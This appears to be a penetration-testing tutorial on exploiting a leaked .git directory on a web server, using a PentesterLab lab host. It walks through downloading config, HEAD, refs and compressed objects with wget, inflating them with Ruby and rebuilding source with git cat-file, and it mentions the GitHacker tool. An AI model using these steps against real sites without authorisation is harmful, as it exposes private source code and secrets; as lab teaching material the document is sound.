Git

Git Information Leak

If the web server leaks the .git directory, we can download this directory recursively:

wget -r http://www.example.com/.git/

Show changes between commits, commit and working tree, etc:

git diff

With modern URL mapping (i.e. not relying on the filesystem), it's less and less common to see these types of issues, but it's always important to be on the lookout for them.

Bypass Restrictions

If directory listing is disabled, we should examine the following two files first:

• .git/config

• .git/HEAD

Access https://www.example.com/.git/config:

[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true

Access https://www.example.com/.git/HEAD:

ref: refs/heads/master

Access https://www.example.com/.git/refs/heads/master:

5346cb2290d9918bfaad7318ebcb2498fe5ebe18

Here 53 is a directory name and 46cb2290d9918bfaad7318ebcb2498fe5ebe18 is a hash. This hash represents a commit and it can found at .git/objects/53/. Download this commit:

wget https://ptl-8ddb9a66-9a79abff.libcurl.so/.git/objects/53/46cb2290d9918bfaad7318ebcb2498fe5ebe18

The file was compressed with zlib, but there isn't a built-in tool for zlib decompression. We can decompress it with Ruby:

$ ruby -rzlib -e 'print Zlib::Inflate.new.inflate(STDIN.read)' < 46cb2290d9918bfaad7318ebcb2498fe5ebe18

commit 199tree 58ace0476093d04023f84d7816adacfa7b879c43
author Louis Nyffenegger <louis@pentesterlab.com> 1652405113 +0000
committer Louis Nyffenegger <louis@pentesterlab.com> 1652405113 +0000

Initial import

From there, we get a new commit that we can download, and from there, check the content by deflating it and running strings -a on the result:

$ wget https://ptl-8ddb9a66-9a79abff.libcurl.so/.git/objects/58/ace0476093d04023f84d7816adacfa7b879c43
$ ruby -rzlib -e 'print Zlib::Inflate.new.inflate(STDIN.read)' < ace0476093d04023f84d7816adacfa7b879c43 | strings -a

tree 182
40000 css
100644 favicon.ico
s100644 footer.php
3100644 header.php
100644 index.php

We want the hash for each file. Create our own git repo:

mkdir hack ; cd hack ; git init

Copy files to it:

$ mkdir -p .git/objects/53 .git/objects/58
$ cp ../46cb2290d9918bfaad7318ebcb2498fe5ebe18 .git/objects/53/
$ cp ../ace0476093d04023f84d7816adacfa7b879c43 .git/objects/58/

Retrieve hashes:

$ git cat-file -p 58ace0476093d04023f84d7816adacfa7b879c43

040000 tree b352dde43705f193d2c1d4e6f6a133321186869f	css
100644 blob f303c6a7797f5e7a0d5bd31d39a7149366bbf873	favicon.ico
100644 blob 5adab1a1c52dc009d4f26bbce30dacc4c93eea33	footer.php
100644 blob c3646db7f9c7e6f126c75900fdcce16d50e1da82	header.php
100644 blob 88beb94b5e1fc48e1625c89f892b04bffb58225c	index.php

Just to save time, assume that we know the key is inside header.php. Create a directory and download this file:

mkdir .git/objects/c3 && wget https://ptl-8ddb9a66-9a79abff.libcurl.so/.git/objects/c3/646db7f9c7e6f126c75900fdcce16d50e1da82 -O .git/objects/c3/646db7f9c7e6f126c75900fdcce16d50e1da82

Examine source code:

git cat-file -p c3646db7f9c7e6f126c75900fdcce16d50e1da82

GitHacker

GitHacker is a multiple threads tool to detect whether a site has the .git folder leakage vulnerability. It is able to download the target .git folder almost completely. This tool also works when the DirectoryListings feature is disabled.

Installation: pip3 install GitHacker

Usage: githacker --url http://127.0.0.1/.git/ --folder result